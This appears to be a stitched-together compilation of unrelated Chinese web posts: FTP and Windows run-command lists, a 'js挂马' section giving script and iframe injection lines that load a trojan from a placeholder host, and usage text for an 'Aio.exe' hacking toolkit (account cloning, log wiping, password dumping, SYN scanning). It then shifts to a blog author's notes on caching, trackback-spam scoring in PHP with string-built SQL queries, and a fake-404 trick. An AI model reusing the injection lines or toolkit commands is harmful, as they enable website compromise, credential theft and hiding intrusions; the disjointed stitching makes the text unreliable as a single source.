52.rstatus[file-name]：若未指定文件名，则显示远程主机的状态， 否则显示文件状态。

53.rename[from][to]：更改远程主机文件名。
54.reset：清除回答队列。

55.restart marker：从指定的标志marker处，重新开始get或put，如：restart 130。
56.rmdir dir-name：删除远程主机目录。

57.runique：设置文件名只一性存储，若文件存在，则在原文件后加后缀.1， .2等。
58.send local-file[remote-file]：同put。

59.sendport：设置PORT命令的使用。
60.site arg1，arg2...：将参数作为SITE命令逐字发送至远程ftp主机。

61.size file-name：显示远程主机文件大小，如：site idle 7200。
62.status：显示当前ftp状态。

63.struct[struct-name]：将文件传输结构设置为struct-name， 缺省时使用stream结构。
64.sunique：将远程主机文件名存储设置为只一(与runique对应)。

65.system：显示远程主机的操作系统类型。
66.tenex：将文件传输类型设置为TENEX机的所需的类型。

67.tick：设置传输时的字节计数器。
68.trace：设置包跟踪。

69.type[type-name]：设置文件传输类型为type-name，缺省为ascii，如:type binary，设置二进制传输方式。
70.umask[newmask]：将远程服务器的缺省umask设置为newmask，如：umask 3

71.user user-name[password][account]：向远程主机表明自己的身份，需要口令时，必须输入口令，如：user anonymous my@email。
72.verbose：同命令行的-v参数，即设置详尽报告方式，ftp 服务器的所有响 应都将显示给用户，缺省为on.

73.?[cmd]：同help.

#11 十一：

7：计算机运行命令全集 winver---------检查Windows版本
wmimgmt.msc----打开windows管理体系结构
wupdmgr--------windows更新程序
winver---------检查Windows版本
wmimgmt.msc----打开windows管理体系结构
wupdmgr--------windows更新程序
wscript--------windows脚本宿主设置
write----------写字板winmsd-----系统信息
wiaacmgr-------扫描仪和照相机向导
winchat--------XP自带局域网聊天
mem.exe--------显示内存使用情况
Msconfig.exe---系统配置实用程序
mplayer2-------简易widnows media player
mspaint--------画图板
mstsc----------远程桌面连接
mplayer2-------媒体播放机
magnify--------放大镜实用程序
mmc------------打开控制台
mobsync--------同步命令
dxdiag---------检查DirectX信息
drwtsn32------ 系统医生
devmgmt.msc--- 设备管理器
dfrg.msc-------磁盘碎片整理程序
diskmgmt.msc---磁盘管理实用程序
dcomcnfg-------打开系统组件服务
ddeshare-------打开DDE共享设置
dvdplay--------DVD播放器
net stop messenger-----停止信使服务
net start messenger----开始信使服务
notepad--------打开记事本
nslookup-------网络管理的工具向导
ntbackup-------系统备份和还原
narrator-------屏幕"讲述人"
ntmsmgr.msc----移动存储管理器
ntmsoprq.msc---移动存储管理员操作请求
netstat -an----(TC)命令检查接口
syncapp--------创建一个公文包
sysedit--------系统配置编辑器
sigverif-------文件签名验证程序
sndrec32-------录音机
shrpubw--------创建共享文件夹
secpol.msc-----本地安全策略
syskey---------系统加密，一旦加密就不能解开，保护windows xp系统的双重密码
services.msc---本地服务设置
Sndvol32-------音量控制程序
sfc.exe--------系统文件检查器
sfc /scannow---windows文件保护
tsshutdn-------60秒倒计时关机命令
tourstart------xp简介（安装完成后出现的漫游xp程序）
taskmgr--------任务管理器
eventvwr-------事件查看器
eudcedit-------造字程序
explorer-------打开资源管理器
packager-------对象包装程序
perfmon.msc----计算机性能监测程序
progman--------程序管理器
regedit.exe----注册表
rsop.msc-------组策略结果集
regedt32-------注册表编辑器
rononce -p ----15秒关机
regsvr32 /u *.dll----停止dll文件运行
regsvr32 /u zipfldr.dll------取消ZIP支持
cmd.exe--------CMD命令提示符
chkdsk.exe-----Chkdsk磁盘检查
certmgr.msc----证书管理实用程序
calc-----------启动计算器
charmap--------启动字符映射表
cliconfg-------SQL SERVER 客户端网络实用程序
Clipbrd--------剪贴板查看器
conf-----------启动netmeeting
compmgmt.msc---计算机管理
cleanmgr-------**整理
ciadv.msc------索引服务程序
osk------------打开屏幕键盘
odbcad32-------ODBC数据源管理器
oobe/msoobe /a----检查XP是否激活
lusrmgr.msc----本机用户和组
logoff---------注销命令
iexpress-------木马捆绑工具，系统自带
Nslookup-------IP地址侦测器
fsmgmt.msc-----共享文件夹管理器
utilman--------辅助工具管理器
gpedit.msc-----组策略

二、js挂马
<script src=http://www.xxx.com/muma.js></script>

三、js变形加密
<SCRIPT language="JScript.Encode" src=http://www.xxx.com/muma.txt></script>
muma.txt可改成任意后缀的。

四、不是嵌入了与iframe不同
top.document.body.innerHTML = top.document.body.innerHTML + '\r\n<iframe src="木马地址"></iframe>'

这是一个将很多小工具功能集成一体的一个"工具".

(如果你使用的是Build 04/01/2006版本,那版本中的syn扫描因编译时原因有些问题,请更新为Build 06/10/2006版本)

功能:
1.AutoRun             -> 查看一般登陆后启动的项
用法:Aio.exe -AutoRun

2.Clone               -> 克隆帐户
用法: Aio.exe -Clone 正常帐号 要被克隆帐户 密码
例子: Aio.exe -Clone Administrator Guest test
帮助: Aio.exe -Clone
不需要在system权限下也可用

3.CheckClone          -> 检测克隆帐户
用法: Aio.exe -CheckClone
不需要在system权限下也可用

4.CleanLog            -> 清除日志
用法: Aio.exe -CleanLog

5.ConfigService       -> 修改服务的启动类型
用法: Aio.exe -ConfigService 服务器 启动类型
例子: Aio.exe -ConfigService W3svc Demand   ->手动启动
例子: Aio.exe -ConfigService W3svc Auto     ->自动启动
例子: Aio.exe -ConfigService W3svc Disabled ->禁止启动
帮助: Aio.exe -ConfigService

6.DelUser             -> 删除系统帐户
用法: Aio.exe -DelUser 帐户
例子: Aio.exe -DelUser Guest
帮助: Aio.exe -DelUser
(注意: 可以删除系统内建帐号,象Administrator,Guest等,小心使用)

7.EnumService         -> 列举系统服务
用法: Aio -EnumService All|Running|Stopped
例子: Aio -EnumService All      -> 列举所有服务
例子: Aio -EnumService Running  -> 列举正在运行的服务
例子: Aio -EnumService Stopped  -> 列举停止了的服务
帮助: Aio -EnumService

8.FHS                 -> 检查系统隐藏服务
用法: Aio.exe -FHS

9.FGet                -> FTP下载
用法: Aio.exe -FGet FTP地址 端口 用户名 密码 要下载文件名
例子: Aio.exe -FGet 12.12.12.12 21 test test a.exe
例子: Aio.exe -FGet 12.12.12.12 21 test test *.exe (下载所有exe文件)
帮助: Aio.exe -FGet

10.FindPassword       -> 得到NT/2K所有登陆系统用户密码
用法: Aio.exe -FindPassword

11.InstallService     -> 安装服务
用法: Aio.exe -InstallService 服务名 文件名
例子: Aio.exe -InstallService test test.exe
帮助: Aio.exe -InstallService

11.InstallService     -> 安装驱动
用法: Aio.exe -InstallDrver 服务名 驱动文件名
例子: Aio.exe -InstallDriver test test.sys
帮助: Aio.exe -InstallDriver

12.KillTCP            -> 杀掉一个TCP连接
用法: Aio.exe -KillTCP 本地IP 本地端口 远程地址 远程端口
例子: Aio.exe -KillTCP 192.168.1.1 80 61.61.61.61 7890
帮助: Aio.exe -KillTCP
(参数可以通过netstat -an得到)

13.LogOff             -> 注销系统
用法: Aio.exe -LogOff

14.MGet               -> HTTP下载文件
用法: Aio.exe -MGet URL <保存为文件名>
例子: Aio.exe -MGet http://www.abc.com/test.exe abc.exe
帮助: Aio.exe -MGet

15.MPort              -> 端口和程序关连映射
用法: Aio.exe -Mport

16.Never              -> 将系统帐户登陆次数重置为0
用法: Aio.exe -Never 帐户
例子: Aio.exe -Never Guest
帮助: Aio.exe -Never

17.PowerOff           -> 关机,关电源
用法: Aio.exe -PowerOff

18.Pslist             -> 列进程
用法: Aio.exe -Pslist

19.Pskill             -> 杀进程
用法: Aio.exe -Pskill PID|进程名
例子: Aio.exe -Pskill 3465
例子: Aio.exe -Pskill Iexplore

20.PortScan           -> 端口扫描(Syn和TCP扫描)
用法: Aio.exe -PortScan Syn|TCP -S 起始地址 -E 终止地址 -P 端口列表 -T 线程数 </Banner> </TS> </S5> </Save>
例子: Aio.exe -PortScan Syn -S 61.129.1.1 -E 61.129.1.255 -P 3389 -T 512 /TS     -> 扫描61.129.1.1到61.129.1.255的主机的3389端口,检查是否打开的是终端
例子: Aio.exe -PortScan Syn -S 61.129.12.12 -P 1-65535 -T 512 /TS    -> 扫描61.129.12.12主机65535个端口,检查哪个端口打开的终端服务
例子: Aio.exe -PortScan Syn -S 61.129.12.12 -P 1-65535 -T 512 /S5    -> 扫描61.129.12.12主机65535个端口,检查哪个端口打开的Socks5服务
帮助: Aio.exe -PortScan
(更多用法,请参考我发布的SynScan)
这个功能的用法是最多的,而且也是很强大的.(Syn扫描只适用于2K或以上系统)

21.PortRelay          -> TCP数据转发
用法: Aio.exe -PortRelay 本地绑定端口 转发至的IP 转发至端口
例子: Aio.exe -PortRelay 3389 211.12.12.12 3389
帮助: Aio.exe -PortRelay

22.Reboot             -> 重启系统
用法: Aio.exe -Reboot

23.RemoveService      -> 删除服务
用法: Aio.exe -RemoveService 要删除的服务
例子: Aio.exe -RemoveService test
帮助: Aio.exe -RemoveService

24.StartService       -> 启动服务
用法: Aio.exe -StartService 要启动的服务
例子: Aio.exe -StartService test
帮助: Aio.exe -StartService

25.StopService        -> 停止服务
用法: Aio.exe -StopService 要停止的服务
例子: Aio.exe -StopService Test
帮助: Aio.exe -StopService

26.Sysinfo            -> 查看系统信息
用法: Aio.exe -Sysinfo

27.ShutDown           -> 关机
用法: Aio.exe -ShutDown

28.Terminal           -> 安装终端服务(2K/XP/2003中都适用)
用法: Aio.exe -Terminal 端口
例子: Aio.exe -Terminal 3389
帮助: Aio.exe -Terminal

29.Unhide             -> 查看星号密码(NT系统有效)
用法: Aio.exe -Unhide

30.WinInfo            -> 查看帐户信息等
用法: Aio.exe -WinInfo <帐户>
例子: Aio.exe -WinInfo
例子: Aio.exe -WinInfo Guest

如果发现什么bug,请到论坛中发贴或发信到WinEggDrop@hotmail.com

我朋友又问？那不是动态缓存需要更加多的判断和操作？其实是错的。动态缓存要比静态缓存先进多，至少在我看来是这样。目前绝大多数WEB程序生成静态页面，都是采用静态生成。这就是我一直不做静态缓存（生成）的原因——麻烦。

因为静态缓存，有比较严重的缺点——数据即时性。如果要保证静态页面的某些数据的即时性，也可以说同步更新，就必须执行大量操作，统计，重新写入。或者是改变内容后，还要重新生成。如果不注重即时性，那也要定期重新更新所有静态文件。因此，在后台和前台都必须要有代码来执行更新和写文件的操作。

我说动态缓存就比静态缓存，先进就先进在生成是触发式的，这样可以让后台部分少去了很多操作。比如写完文章后，不生成静态页面，有用户第一次访问时，检查是否有缓存过的记录或者缓存文件是否存在。没有，就生成，这次操作稍微慢点，然后记录一下，第2个用户访问时，系统检查到有缓存的记录。就直接调用缓存文件。这次的速度就快了。对数据库的访问也就减少了。我们还可以给缓存设置一个有效期，当前台用户浏览时，可以触发是否更新。更新的话，这个用户浏览肯定会稍微慢点。但是第2个用户就又快了。又可以看到新内容了。后台干预的操作也大大减少了。当然，管理员可以有时间去喝咖啡了。

比如SABLOG-X要加入动态缓存的功能那我们就要多加几个字段来记录某些信息。

lastvisit 最后访问时间
cached 是否已经缓存 默认0

新文章，cached当然为0了。第一个用户访问，然后就开始生成文件，处理数据库的信息是个漫长的过程，可能也就0.00N秒吧。呵呵。生成完毕后，更新cached的值为1，然后跳转到/cachedir/datedir/articleid.html。

当第2个用户访问，查询到cached的值是1，就直接跳转或者调用/cachedir/datedir/articleid.html，就跳过了下面对数据库的操作。当然，之中可以加入缓存有效时限的判断操作，看看lastvisit和当前时间的间隔。这个间隔可以在后台设置，比如1天，2天……如果大了。就把缓存删除。再生成。如果小了。继续调用缓存文件或者跳转。反正用不了几毫秒。这一步也可以在后台批量操作。反正代码也简单。总之操作要比静态缓存简单得多。代码量肯定也要少得多。

这下就不用和朋友解释这么多了，说这么通俗。再笨都懂了。不知道有没有高手的思路或者方法更加好的。欢迎交流交流。

最近学习了不少东西，本来如果不预定51发布SABLOG-X的，就可以加入更加多的重大改进。但是为了不跳票。只能将就咯。我脸皮比较厚，敢说现在的SABLOG-X在国产BLOG中，也算排得比较靠前的了。哈哈。

目前来说，防范Trackback垃圾已经迫在眉睫，因为到现在为止。很多BLOG只做了一些评论的过滤，要防范评论垃圾信息很简单，但是防范Trackback Spam却不能象评论那样，因为Trackback来自其他的BLOG，所以很多内容都是不可以确定的，比如按照其他链接出现次数，和垃圾词汇进行过滤，是不可能的，不然我收集一些网站，或者是骂点人。都有可能不能通过别人的BLOG检查。所以我根据Trackback Spam的特征，想出了一套比较可行的办法。采用分数制度，给接收来的Trackback数据，进行评分操作。最后决定数据处理办法。懒得组织语言说了。贴出我和BO-BLOG作者BOB的部分聊天记录。

用户：所有分组(QQ好友) ================================================== 消息组：我的好友(92) ================================================== 消息类型：聊天记录 ================================================== -------------------------------------------------- 消息对象：Bob(22112197) -------------------------------------------------- 2006-04-10 15:22:51 Small!A 在？   2006-04-10 15:23:17 Small!A 我想到一个比较有意思的防范track的办法。讨论一下。   2006-04-10 20:22:24 Bob 什么好主意啊？ 2006-04-10 20:23:57 Bob 说来听听呀 2006-04-10 20:24:45 Small!A 我不知道。只是有一个打分数的想法。 2006-04-10 20:24:52 Small!A 不知道有用不。 2006-04-10 20:24:29 Bob 嗯，打分法 2006-04-10 20:24:41 Bob 不过怎么操作呢 2006-04-10 20:25:37 Bob 好像很高深呀... 2006-04-10 20:28:51 Small!A 定义一个初始分数。 我是这样来的。 $point = 0; 发送完整的trackback里面不是有url吗？ 直接读取这个url的源代码进行分析。读取失败。减1分。 如果可以在原代码里找到提交url。加一分。 找到标题加一分，找到摘要加一分，就是通过对比。 综合起来的分数。可能是负的，可能是正的。 如果是负的。就表示是垃圾。 2006-04-10 20:29:09 Small!A 具体我在实验。不知道有效果不。。 2006-04-10 20:29:15 Bob 不错的思路3481D2 2006-04-10 20:29:34 Bob 关键词可以考虑进去否？ 2006-04-10 20:29:46 Bob 我今天在地铁上冒出来一个想法 2006-04-10 20:31:10 Small!A 还有可以设置过滤强度。比如计算结果是0。则表示基本正常。大于零，正常。如果-1。我表示为弱。设置为隐藏。到后台审核。如果得到-2甚至更少的分数。就表示在我设置的强 度过滤范围内。就直接不予处理。 2006-04-10 20:32:23 Small!A 我想过了。关键词和HTTP出现次数。都不行。不同于评论。不能用评论的办法。我发的文章。刚巧你禁止内容内的某个词。或者我是推荐一些好网站。超过你设置的HTTP次数。那 不是没办法PING你？ 2006-04-10 20:32:20 Bob 我今天想到一个。。。可以建立一个trackback回访制度。 2006-04-10 20:32:29 Bob 让我整理一下思路。。。 2006-04-10 20:33:11 Small!A 好的。等你组织语言。呵呵。 2006-04-10 20:35:04 Bob 比如，A发送给B一个trackback，B在检查之后发现A是来自从来没有发送过trackback给他的一个地址。于是，A的TB暂时不显示。B的管理员通过A的tb之后，B自动向A发送一个确认 密码串。今后A再次向B发送TB时，自动附上这个密码串。B验证这个密码的正确性，再检查A是否在曾经允许过的列表内。两者都正确后即刻显示。。。 2006-04-10 20:35:39 Bob [表情]有点bt的想法 2006-04-10 20:37:59 Small!A 这个相当于几次握手了？我感觉不是很舒服。是我不会再给你发了。 我的看法是在我们这边单方面处理。如果双方都要处理的话。你没办法确定对方的BLOG系统跟你是否统一标准。涉及到处理我估计会麻烦不少。。。 2006-04-10 20:38:04 Bob 嗯，麻烦就在于要在现有的标准上 2006-04-10 20:38:21 Bob 而trackback的标准本来就不考虑spam 2006-04-10 20:38:50 Bob 分数这个可以试试看效果的。。。 2006-04-10 20:39:03 Bob 有没有可能建立一套分数的评分规范。。。 2006-04-10 20:39:47 Small!A 所以我想先试试我的想法是否可行。 2006-04-10 20:39:23 Bob 尽量为越来越多的程序采用 2006-04-10 20:40:16 Small!A 不知道。所以我如果可以有效防范。我们再谈谈如何统一吧。。 2006-04-10 20:40:22 Bob 有没有测试的工具C7B305 2006-04-10 20:40:36 Bob 俺来发几个垃圾信息轰炸一下 2006-04-10 20:41:24 Small!A 如果能找到测试工具倒不错。我晚上先手工测试一下。 2006-04-10 21:14:19 Small!A 我给你段代码。你== 2006-04-10 21:13:58 Bob hao〕 2006-04-10 21:17:00 Small!A 放你的WEB上。给我地址。 2006-04-10 21:17:13 Small!A 然后我发送TRACK看看。分数是多少。 2006-04-10 21:27:12 Small!A 1分。 2006-04-10 21:26:42 Bob 正常了 2006-04-10 21:27:27 Small!A 恩。我是这样想的。如果是软件发送。。 2006-04-10 21:27:35 Small!A 我组织一下语言。。== 2006-04-10 21:27:37 Small!A 哈哈 2006-04-10 21:27:12 Bob 嘿嘿，我把发送时候的标题改掉 2006-04-10 21:27:18 Bob 让他找不到 2006-04-10 21:28:18 Bob $point:0 [:D] 2006-04-10 21:31:26 Small!A 如果他是软件发送。那么他就只有一个地址 他要发送的话。必须提供 $articleid $title $excerpt $url $blog_name 这5个必须的。对吧？ 我们的tb.php文件。就去抓取他的url的内容。看看内容里是不是包含了他提交的title等这些数据。如果包含。则说明他可能是正常发送。 也就是说。他要正常发送。就要提供正确的数据。只要正确的数据。才加分。否则减分。分数过低。直接CUT掉！ 2006-04-10 21:31:21 Bob 我懂了 2006-04-10 21:32:08 Small!A 即使他伪造，也要伪造出正确并且实际存在的。能访问到的。 2006-04-10 21:31:36 Bob 他为了伪造发送，必须提供一个可以访问 2006-04-10 21:31:38 Bob 对 2006-04-10 21:32:15 Small!A 恩。 2006-04-10 21:32:22 Small!A 我的思路就是这样。你有没有更好的办法？ 2006-04-10 21:32:01 Bob 暂时没有 2006-04-10 21:32:39 Small!A 当然我想仅仅这些判断。估计不够。还多想一点。 2006-04-10 21:32:44 Small!A 你认为这个办法可行不？ 2006-04-10 21:32:12 Bob 不过如果他的地址的确能访问呢？ 2006-04-10 21:32:25 Bob 这好像就是他发spam的目的啊 2006-04-10 21:33:09 Bob 不过，效果肯定会有的 2006-04-10 21:34:20 Small!A 所以我们在后台设置一个防范强度。 [图片] 分数在某个范围属于强？某个范围输入弱。可以根据判断是隐藏该引用。还是直接不处理该引用。 2006-04-10 21:35:37 Bob good 2006-04-10 21:36:13 Small!A 可以根据范围判断是隐藏该引用。还是直接不处理该引用。 分数特别低或者最低。就可以不处理了。这个范围就是防范等级咯。 2006-04-10 21:36:08 Bob 改天我要把trackback部分重写一下。现在我的tb没有隐藏这个熟悉 2006-04-10 21:36:12 Bob 属性 2006-04-10 21:37:00 Small!A 我的也没有。要加字段了。呵呵。 2006-04-10 21:36:41 Bob 我的倒不必 2006-04-10 21:36:55 Bob 本来就和评论共用了一个表 2006-04-10 21:37:29 Small!A 你通过什么判断属性？ 2006-04-10 21:37:56 Small!A 哦。明白。加个type判断是什么对吧？ 2006-04-10 21:37:31 Bob 0= 公开评论 1＝隐藏评论 2＝垃圾嫌疑的公开评论 3＝垃圾嫌疑隐藏评论 4＝tb 2006-04-10 21:37:44 Bob 看来要用到 5

相信大家看了应该都知道是怎么防御这个Trackback Spam了。具体代码是怎么实现的呢？下面就是目前Sablog-X所使用的代码：

// 检查Spam

// 定义发送来的此条Trackback初始分数

$point = 0;

$options['tb_spam_level'] = in_array($options['tb_spam_level'], array('strong', 'weak', 'never')) ? $options['tb_spam_level'] : 'weak';

if ($options['audit_trackback']) {

     //如果人工审核

     $visible = '0';

} elseif ($options['tb_spam_level'] != 'never') {

     $source_content = '';

     if (!empty($url)) {

          $source_content = fopen_url($url);

          $this_server = str_replace(array('www.', 'http://'), '', $_SERVER['HTTP_HOST']);

          //获取接受来的url原代码和本服务器的hostname

     }

     if (empty($source_content)) {

          //没有获得原代码就-1分

          $point -= 1;

     } else {

          if (strpos(strtolower($source_content), strtolower($this_server)) !== FALSE) {

               //对比链接，如果原代码中包含本站的hostname就+1分，这个未必成立

               $point += 1;

          }

          if (strpos(strtolower($source_content), strtolower($title)) !== FALSE) {

               //对比标题，如果原代码中包含发送来的title就+1分，这个基本可以成立

               $point += 1;

          }

          if (strpos(strtolower($source_content), strtolower($excerpt)) !== FALSE) {

               //对比内容，如果原代码中包含发送来的excerpt就+1分，这个由于标签或者其他原因，未必成立

               $point += 1;

          }

     }

     $interval = ($options['tb_spam_level'] == 'strong') ? '30' : '60';

     //根据防范强度设置时间间隔，强的话在30内发现有同一IP发送。弱的话就是60秒内发现有同一IP发送.

     $query = $DB->query("SELECT trackbackid FROM ".$db_prefix."trackbacks WHERE ipaddress='".getip()."' AND dateline+".$interval.">='".time()."'");

     $tatol = $DB->num_rows($query);

     //在单位时间内发送的次数

     if ($tatol > 0) {

          //如果发现在单位时间内同一IP发送次数大于0就扣一分，人工有这么快发送trackback的吗？

          $point -= 1;

     }



     $query = $DB->query("SELECT trackbackid FROM ".$db_prefix."trackbacks WHERE REPLACE(LCASE(url),'www.','')='".str_replace('www.','',strtolower($url))."'");

     $tatol = $DB->num_rows($query);

     //对比数据库中的url和接收来的

     if ($tatol > 0) {

          //如果发现有相同，扣一分。

          $point -= 1;

     }



     if ($options['tb_spam_level'] == 'strong') {

          //高强度防范

          $query = $DB->query("SELECT title,ipaddress,articleid FROM ".$db_prefix."trackbacks WHERE ipaddress='".getip()."' OR articleid='".$articleid."'");

          //搜索数据库内发送此trackback来本站的IP和文章ID

          while ($trackback = $DB->fetch_array($query)) {

               if ($trackback['title'] == $title && $trackback['ipaddress'] == getip()) {

                    //如果数据库内的title和接收来的title一样，IP也一样，视为重复发送。就减1分。

                    $point -= 1;

               }

               if ($trackback['ipaddress'] == getip() && $trackback['articleid'] == $articleid) {

                    //如果数据库内的articleid和接收来的articleid一样，IP也一样，视为重复发送。就减1分。

                    $point -= 1;

               }

          }

          // 防范强:最终分数少于1分就CUT！

          $visible = (($point < 1) ? '0' : '1');

     } else {

          // 防范弱:最终分数少于0分才CUT！

          $visible = (($point < 0) ? '0' : '1');

     }

} else {

     $visible = '1';

}

// 检查Spam完毕

上次和O-BLOG作者风色提起过，可是不经常看他上QQ，目前通过大量测试。。已经证实可以起到防御的作用。希望有各位看了我的文章，可以提出自己的看法，互相交流。继续共同提高。呵呵。

要拍砖的，尽管来，没有刺激，哪有膨胀，没有压力，哪有动力，没有反馈，哪有更好？

18日中午想到的，还可以多加一条判断就是拿接收到的$url参数和数据库内的对比，如果存在了，再扣一分！

所以我在几个重要目录里，放了一个index.php文件。文件内容:

<?php
header('HTTP/1.1 404 Not Found');
?>
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD><BODY>
<H1>Not Found</H1>
The requested URL <?php echo dirname($_SERVER["SCRIPT_NAME"]);?> was not found on this server.<P>
<HR>
<ADDRESS>Web Server at <?php echo $_SERVER["SERVER_NAME"];?> Port <?php echo $_SERVER["SERVER_PORT"];?></ADDRESS>
</BODY></HTML>

很多扫描器都是通过HTTP协议标头信息判断，所以我发送一个404，就表示目录或文件都不存在。我用扫描器扫描WEB路径，看看扫描于震的BLOG就把所有目录都扫描出来了。而扫描我的。只扫描出几个没有放上面的代码的目录。

这样，如果不手工去判断，或者更好的设置扫描器。就很难判断出admin、include这些目录是否存在。安全，需要从每一个细小的环节做起。呵呵。这下大家知道为什么我后台不用index.php作为首页了吧。

欢迎大家继续测试。如果是正常从各位的BLOG发送过来的。应该是接收没有什么问题的。后台可以设置防范等级。欢迎发送各种Trackback spam来这篇文章。其他的文章希望各位大哥大姐手下留情。

根据后台的记录，发现 59.42.188.xx 的朋友在11日晚上9:20-9:30这段时间发送了10多条Trackback过来。成功拦截了10多条，有2条系统认为是正常的。特别感谢这位朋友的热心测试。

感谢小麟哥 - Fighting!的手工测试！如果不介意，请再手工发送几十条过来看看。

12日凌晨4点把所有垃圾或者测试的Trackback清除，最新加入了人工发送的判断。各位如果愿意花5分钟，继续疯狂轰炸这篇文章。让我好不断改善。杜绝各种垃圾信息！谢谢各位啦！！！

再次感谢221.235.207.xx，（59.35.10.xx，59.35.49.xx，59.35.36.xx），221.12.110.xx 这3位朋友的热心测试。后台记录了共30多条来自这几个IP发送的测试数据。

sadly搞的Trackback垃圾，很多人说这个人不怎么样，说发这些怎么怎么不对，站在网络安全角度来说。sadly是好样的。我们发现漏洞，如果不发布出来。只有导致更加多的人受害。只有公布了以后。不管白与黑。技术都会有提高。不知道sadly能不能看到我的文章。但是不管多少人骂你发Trackback垃圾，但是作为网络安全技术人员。我支持你。呵呵。

我们搞安全的知道一个定律，道高一尺，魔高一丈。如果按照BO-BLOG的方法，在URL加特殊字符串，如果软件读取HTML代码，分析出那段特殊字符串，一样可以发送垃圾。只要是文本。要分析出来可以在1秒或者2秒之内。呵呵。图片验证？算了吧。

我看。还是用评论防止垃圾的办法。自己判断设置属性为隐藏吧。。再到后台按照IP清理吧。

单用户的博客系统不同于各种CMS，大流量，服务器完全可以承受，除非那种查询很多的博客，基于数据库的WEB程序非常多，竞争造成了静态页面的流行。对于那些死的不变的系统，批量生成html页面确实是不错的技术，大大提高网站的稳定性、降低负载。可以减少SQL服务器的负荷。我觉得模拟静态和真正的静态没有什么区别。没有必要用那么一大堆文件。和那么多代码代替几行模拟静态的代码。而且后期维护也麻烦。改动一次还要写一次文件，就安全角度来说，多一个可写目录。多一个保存后门的地方。

至于为了搜索引擎而优化，这个其实是误传。看搜索引擎列出的页面，asp、cgi、php、aspx的什么都有，并不时只有html的。搜索引擎看的是内容（例如一些关键head中的标记），要根据所有引擎的算法不断修改产生的页面的内容。即使不模拟出静态页面，也照样可以搜索得到。比如：

http://www.baidu.com/baidu?word=%C2%DB%CE%C4%CC%E1%B8%D9&tn=myie2dg

上面的关键词，就是“论文提纲”，搜索出来的就是Sablog程序。排行第一。照样不是静态文件，不是html结尾。所以说静态文件和非静态的，对搜索引擎没有什么影响。

还不知道有什么理由还要做静态生成？

不过前台也有几处代码。有点问题。没有细细研究。感觉希望不大。不过真开心。隔了这么久没有分析代码，居然现在还具备这种能力。太好了。

已经联系过BO-BLOG的作者BOB了。漏洞细节就不说了。

Tag功能的表结构设计存在一定问题。目前是通过模糊搜索查询方式来匹配标签，进而通过标签来匹配到文章。这个实现方式有两个致命的缺点：

1. 大数据量下标签搜索的效率问题。
2. 标签匹配的准确性问题。（所记录的标签出现条数并非模糊搜索显示出的条数）

的确。本来刚有人和我提出的时候，我就把改善TAG表列入计划中。可是后来忘记了。结果这次发布的测试版后。高手又提出了这个问题。才让我想起来。的确要改善。